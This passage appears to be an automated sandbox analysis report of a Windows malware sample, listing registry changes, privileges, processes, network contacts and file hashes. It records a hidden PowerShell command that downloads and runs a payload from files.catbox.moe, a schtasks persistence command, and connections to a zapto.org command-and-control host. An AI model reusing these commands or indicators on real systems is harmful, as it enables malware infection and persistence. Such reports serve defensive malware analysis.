| Set value (str) | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b = "\\\\?\\Volume{6746542D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\c11525ea1ed9d0d7159ff70dbf7f87bd47271147dcfa922bb64e44b154675868" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 = 9e1a053afcc8db01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 = "\\\\?\\Volume{6746542D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\c11525ea1ed9d0d7159ff70dbf7f87bd47271147dcfa922bb64e44b154675868" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000002c25023afcc8db012c25023afcc8db012c25023afcc8db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b35a3da32000633131353235656131656439643064373135396666373064626637663837626434373237313134376463666139323262623634653434623135343637353836380000b20009000400efbeb35a3da3b35a3da32e00000000000000000000000000000000000000000000000000d4a9b500630031003100350032003500650061003100650064003900640030006400370031003500390066006600370030006400620066003700660038003700620064003400370032003700310031003400370064006300660061003900320032006200620036003400650034003400620031003500340036003700350038003600380000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000008c9cb60b1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63313135323565613165643964306437313539666637306462663766383762643437323731313437646366613932326262363465343462313534363735383638000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062616d7564746b710000000000000000d0afe384b7e060428074769582fbd8402a6160966527f011b64c6674a9969650d0afe384b7e060428074769582fbd8402a6160966527f011b64c6674a9969650d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003300340032003500370036003700360033002d0031003900390038003400360035003500320036002d0033003800370030003200390035003500300031002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000002d544667000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b = ff856e3afcc8db01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\x69.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\MasonR.bat | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\MasonR.bat | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\x69.exe
"C:\Users\Admin\AppData\Local\Temp\x69.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -EP Bypass -W Hidden -C "iwr 'https://files.catbox.moe/8ruqew.rar' -OutFile $env:TEMP\MasonKit.com; Start-Process -WindowStyle Hidden $env:TEMP\MasonKit.com"
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\MasonKit.com
"C:\Users\Admin\AppData\Local\Temp\MasonKit.com"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "x69" /tr "C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Users\Admin\AppData\Local\Temp\MasonR.bat
"C:\Users\Admin\AppData\Local\Temp\MasonR.bat"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{742a7f0f-e5c2-4a52-b3bb-c750adbe5391}
C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe ccca352727b8f4cbe855cf200336a615 Qni2/g22ikaKUxCH80CEMA.0.1.0.0.0
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Users\Admin\AppData\Roaming\x69.exe
C:\Users\Admin\AppData\Roaming\x69.exe
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | files.catbox.moe | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | grayhatgroupontop.zapto.org | udp |
| EG | 197.160.170.172:1177 | grayhatgroupontop.zapto.org | tcp |
| GB | 2.18.27.76:443 | www.bing.com | tcp |
| EG | 197.160.170.172:1177 | grayhatgroupontop.zapto.org | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
Files
memory/380-0-0x00007FFA58873000-0x00007FFA58875000-memory.dmp
memory/380-1-0x0000000000770000-0x0000000000782000-memory.dmp
memory/1700-2-0x0000017569BD0000-0x0000017569BF2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z4ivcmjw.vrb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1700-12-0x00007FFA58870000-0x00007FFA59331000-memory.dmp
memory/1700-13-0x00007FFA58870000-0x00007FFA59331000-memory.dmp
memory/1700-14-0x00007FFA58870000-0x00007FFA59331000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MasonKit.com
| MD5 | cc08b88c7b9ef35411f7ad9b8952d390 |
| SHA1 | 315c2052a1d8eefc76df94b8fa7b52c037d2ea98 |
| SHA256 | 83c839ff8e487d87992434bd395fb610ce6238c673c4e798724f2a34b6bb68d4 |
| SHA512 | 74c74b03f2c9d14bff1ddcd9259fa58405f7f6f0f50f09d240c131e4258be4046a745ef918861ec0ccc8f6533008473d71c9f1c43b6805b8fa8fec403a12ee24 |
memory/5688-22-0x00000000001E0000-0x000000000027E000-memory.dmp
memory/5688-23-0x00000000022E0000-0x0000000002378000-memory.dmp
memory/1700-26-0x00007FFA58870000-0x00007FFA59331000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MasonR.bat
| MD5 | ae78843b23f7a1c65f6b9a5a031f1950 |
| SHA1 | a12aad340d3eafb919d6cf38fad402f29b570ed0 |
| SHA256 | 8de8fd340cd8057899781e8796f36543092cdfa9028958102bd5fec9f2070447 |
| SHA512 | 648e6f7eeadf9d1ab2ba36311259a20f5b55c16a04a271fe7e7f3ee166e626aea6c6d97e9e5b4f8c9d1d997ab1444bcd1ff5dfa61bd9f1b988c58e30d40dc3b5 |
memory/3160-33-0x0000023605B20000-0x0000023605BBA000-memory.dmp
memory/3160-35-0x00007FFA74D40000-0x00007FFA74DFE000-memory.dmp
memory/3160-34-0x00007FFA76910000-0x00007FFA76B05000-memory.dmp
memory/4812-38-0x0000000140000000-0x00000001401A1000-memory.dmp
memory/4812-40-0x00007FFA74D40000-0x00007FFA74DFE000-memory.dmp
memory/4812-36-0x0000000140000000-0x00000001401A1000-memory.dmp
memory/380-41-0x00007FFA58870000-0x00007FFA59331000-memory.dmp
memory/4812-39-0x00007FFA76910000-0x00007FFA76B05000-memory.dmp
memory/668-57-0x0000025072400000-0x00000250725BB000-memory.dmp
memory/668-59-0x00007FFA36990000-0x00007FFA369A0000-memory.dmp
memory/376-68-0x00007FFA36990000-0x00007FFA369A0000-memory.dmp
memory/948-75-0x00007FFA36990000-0x00007FFA369A0000-memory.dmp
memory/1028-95-0x000001777C340000-0x000001777C4FB000-memory.dmp
memory/1100-99-0x0000024F80D40000-0x0000024F80EFB000-memory.dmp
memory/1028-96-0x00007FFA36990000-0x00007FFA369A0000-memory.dmp
memory/1028-94-0x000001777C340000-0x000001777C4FB000-memory.dmp
memory/1028-93-0x000001777C340000-0x000001777C4FB000-memory.dmp
memory/1028-92-0x000001777C340000-0x000001777C4FB000-memory.dmp
memory/1028-91-0x000001777C340000-0x000001777C4FB000-memory.dmp
memory/540-83-0x00007FFA36990000-0x00007FFA369A0000-memory.dmp
memory/540-82-0x0000027212880000-0x0000027212A3B000-memory.dmp
memory/540-81-0x0000027212880000-0x0000027212A3B000-memory.dmp
memory/540-80-0x0000027212880000-0x0000027212A3B000-memory.dmp
memory/540-79-0x0000027212880000-0x0000027212A3B000-memory.dmp
memory/540-78-0x0000027212880000-0x0000027212A3B000-memory.dmp
memory/1100-98-0x0000024F80D40000-0x0000024F80EFB000-memory.dmp
memory/948-74-0x000001B1CAEE0000-0x000001B1CB09B000-memory.dmp
memory/948-73-0x000001B1CAEE0000-0x000001B1CB09B000-memory.dmp
memory/948-72-0x000001B1CAEE0000-0x000001B1CB09B000-memory.dmp
memory/948-71-0x000001B1CAEE0000-0x000001B1CB09B000-memory.dmp
memory/948-70-0x000001B1CAEE0000-0x000001B1CB09B000-memory.dmp
memory/376-67-0x000002BC81DE0000-0x000002BC81F9B000-memory.dmp
memory/376-66-0x000002BC81DE0000-0x000002BC81F9B000-memory.dmp
memory/376-64-0x000002BC81DE0000-0x000002BC81F9B000-memory.dmp
memory/376-63-0x000002BC81DE0000-0x000002BC81F9B000-memory.dmp
memory/668-58-0x0000025072400000-0x00000250725BB000-memory.dmp
memory/668-56-0x0000025072400000-0x00000250725BB000-memory.dmp
memory/668-55-0x0000025072400000-0x00000250725BB000-memory.dmp
memory/668-54-0x0000025072400000-0x00000250725BB000-memory.dmp
memory/616-51-0x00007FFA36990000-0x00007FFA369A0000-memory.dmp
memory/616-50-0x000001BAE18E0000-0x000001BAE1A9B000-memory.dmp
memory/616-49-0x000001BAE18E0000-0x000001BAE1A9B000-memory.dmp
memory/616-48-0x000001BAE18E0000-0x000001BAE1A9B000-memory.dmp
memory/376-65-0x000002BC81DE0000-0x000002BC81F9B000-memory.dmp
memory/616-46-0x000001BAE18E0000-0x000001BAE1A9B000-memory.dmp
memory/616-45-0x000001BADFD10000-0x000001BADFE4E000-memory.dmp
memory/616-47-0x000001BAE18E0000-0x000001BAE1A9B000-memory.dmp
memory/4812-42-0x0000000140000000-0x00000001401A1000-memory.dmp
memory/380-614-0x00007FFA58873000-0x00007FFA58875000-memory.dmp
C:\Users\Admin\AppData\Roaming\x69.exe
| MD5 | c1ade7728d9871043141fde331aebcf2 |
| SHA1 | c9ebed22e028ff8d2e05dea75f04b2e4ca692d17 |
| SHA256 | 8ead895e1e76dc258954703305da5eed934eb7744eddf4d1b481c70fddefcef6 |
| SHA512 | 97a03bd5194a436b58a01348947cfe3793fac65b5d8b3bb70ce30240d3522ea44f7713548373fcae40f979693e879bef69a72202e3f8fc29f3d731a058b7f6ba |
memory/3984-656-0x0000000000F50000-0x0000000000F62000-memory.dmp
memory/380-659-0x00007FFA58870000-0x00007FFA59331000-memory.dmp
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 1e8e2076314d54dd72e7ee09ff8a52ab |
| SHA1 | 5fd0a67671430f66237f483eef39ff599b892272 |
| SHA256 | 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f |
